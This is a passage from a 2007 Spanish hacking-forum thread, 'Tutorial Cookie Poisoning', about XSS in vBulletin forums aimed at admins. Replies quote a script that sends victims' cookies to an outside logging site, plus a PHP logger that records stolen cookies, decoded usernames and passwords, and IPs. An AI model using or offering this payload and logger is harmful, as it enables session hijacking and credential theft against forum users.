elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Trabajando con las ramas de git (tercera parte)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  Tutorial Cookie Poisoning
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 [2] 3 Ir Abajo Respuesta Imprimir
Autor Tema: Tutorial Cookie Poisoning  (Leído 13,499 veces)
yeikos


Desconectado Desconectado

Mensajes: 1.424



Ver Perfil
Re: Tutorial Cookie Poisoning
« Respuesta #10 en: 28 Mayo 2007, 17:13 pm »

Me he podido dar cuenta k en muchos foros vBulletin la opcion de HTML esta on,esto supongo k hace k puedas hacer XSS, no?? posteando un tema y atrayendo al admin del foro hasta el o sino tambien puedes escribirle un privado si esta activado el HTML y cuadno lo lea...listo ;) (no se si esta ultima funcione)
Saludos

Cuando esta HTML activado muchas etiquetas, como <script>, quedan inutilizadas para evitar el mal uso de estas...

En línea

rakax


Desconectado Desconectado

Mensajes: 341


http://raka.uni.cc


Ver Perfil WWW
Re: Tutorial Cookie Poisoning
« Respuesta #11 en: 28 Mayo 2007, 22:36 pm »

En todos los vBulletin k he entrado las etiquetas <script> funcionan bien ya k me he robado mi cookie :D
Saludos
En línea

Cuanto mas aprendo mas cuenta me doy de lo ignorante que soy.

www.raka.uni.cc
yeikos


Desconectado Desconectado

Mensajes: 1.424



Ver Perfil
Re: Tutorial Cookie Poisoning
« Respuesta #12 en: 29 Mayo 2007, 00:54 am »

En todos los vBulletin k he entrado las etiquetas <script> funcionan bien ya k me he robado mi cookie :D
Saludos

Quizás en el foro vBulleting donde estuve realizando las pruebas había instalado algún addon para evitar el uso de estas etiquetas...
En línea

X_-:XploitX:-_X

Desconectado Desconectado

Mensajes: 36



Ver Perfil
Re: Tutorial Cookie Poisoning
« Respuesta #13 en: 29 Mayo 2007, 12:16 pm »

 interesante ... muy buen trabajo
En línea

si Windows fuera perfecto no existira Linux para serlo
Einsamkeit

Desconectado Desconectado

Mensajes: 2


lichtgestalten


Ver Perfil WWW
Re: Tutorial Cookie Poisoning
« Respuesta #14 en: 6 Julio 2007, 00:45 am »

Recuerdas la vulnerabilidad XSS??? de ese ataque muy conocido podemos hacer un script robador de cookie bueno veamos

el script lo cual es el siguiente codigo

Código:

<script>self.location.href='http://misitio.com/log.php?c='+escape(document.cookie);</script>

disculpa pero en donde escribes el script?   ( soy novato, pero me intereso este truco)   y que es PHP?
En línea

"siehst du mich im licht"
yeikos


Desconectado Desconectado

Mensajes: 1.424



Ver Perfil
Re: Tutorial Cookie Poisoning
« Respuesta #15 en: 6 Julio 2007, 12:36 pm »

Busca en Google información relacionada con HTML, javascript y PHP.
En línea

Grave


Desconectado Desconectado

Mensajes: 314


|\|0\/\/ 15 7|-|3 71/\/\3


Ver Perfil WWW
Re: Tutorial Cookie Poisoning
« Respuesta #16 en: 19 Julio 2007, 20:44 pm »

Alquien podras explicar detenidamente este codigo se entiende un poco a simple vista pero algunas cosas no las entiendo...

Citar
<?php
$archivo = fopen('log2.htm','a');//Aqui podemos cambiar el nombre del archivo a crear
$cookie = $_GET['c'];
$usuario = $_GET['id'];
$ip = getenv ('REMOTE_ADDR');
$re = $HTTPREFERRER;

$fecha=date("j F, Y, g:i a");
fwrite($archivo, '<hr>USUARIO Y PASSWORD: '.base64_decode($usuario).'<br>Cookie: '.$cookie.'<br>Pagina: '.$re.'<br>

IP: ' .$ip. '<br> Fecha y Hora: ' .$fecha. '</hr>');
fclose($archivo);
?>
En línea

"y el conocimiento os hara libres"

Module Console1
   Console.Write("Hello Word")
   Console.ReadLine()
End Module
http://aion.cr0n0triger.operaunite.com/
yeikos


Desconectado Desconectado

Mensajes: 1.424



Ver Perfil
Re: Tutorial Cookie Poisoning
« Respuesta #17 en: 19 Julio 2007, 23:11 pm »

Alquien podras explicar detenidamente este codigo se entiende un poco a simple vista pero algunas cosas no las entiendo...

http://www.google.es/search?hl=es&q=fopen+php&btnG=Buscar&meta=lr%3Dlang_es
En línea

Dark_Knight

Desconectado Desconectado

Mensajes: 97



Ver Perfil
Re: Tutorial Cookie Poisoning
« Respuesta #18 en: 1 Agosto 2007, 22:57 pm »

hola

tengoun problema...

cuando coloco <script>alert(5);</script>

no me aparece el mensaje... sino que me aparece el post con el codigo escrito

en donde se debe colocar el codigo... y/o que se tiene que hacer para que aparezca el mensaje...

espero su respuesta

gracias  ;D
En línea

El hombre no puede crear nada sin antes dar algo a cambio... para crear... algo del mismo valor debe perderse.... esa es la ley de la equivalencia de intercambio... y el que desafie esa ley se convertira en un desafio de las creencias del ser humano y de la existencia de dios....
yeikos


Desconectado Desconectado

Mensajes: 1.424



Ver Perfil
Re: Tutorial Cookie Poisoning
« Respuesta #19 en: 1 Agosto 2007, 23:17 pm »

Eso es por que la variable filtra los caracteres especiales, como pueden ser > o <, mostrado como resultado en tu caso &lt;script&gt;alert(5);&lt;/script&gt;.

Examina el código fuente de la página web en busca del código que introdujiste...
En línea

Páginas: 1 [2] 3 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Problema APR poisoning
Hacking
miguelskk 3 2,887 Último mensaje 28 Julio 2011, 04:27 am
por ChicoQuality
ARP Poisoning (envenenamiento ARP)
Hacking
Black Koala 0 2,447 Último mensaje 14 Diciembre 2022, 23:44 pm
por Black Koala
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines